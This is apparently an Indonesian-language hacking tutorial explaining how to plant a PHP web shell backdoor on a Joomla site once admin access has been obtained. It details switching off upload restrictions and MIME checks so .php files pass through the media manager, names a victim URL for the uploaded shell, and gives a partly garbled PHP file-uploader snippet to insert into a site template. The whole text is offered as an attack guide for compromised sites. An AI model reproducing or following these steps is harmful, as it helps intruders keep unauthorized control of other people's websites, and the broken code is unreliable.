Berbagai macam cara upload shell backdoor pada joomla
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.
CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
lalu upload deh shellnya
udah ke upload :D , lokasi shell ada di http://korban.com/images/namashell.php
Klik menu Extension > template manager
mari kita sisipin uploadernya, taro dibawahecho 'www.cybersquads.com uploader';';
echo '
'.php_uname().'
';
echo '
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES Dab!!!
'; }
else { echo 'JANCOOK !!! Upload GAGAL !!!
'; }
}
?>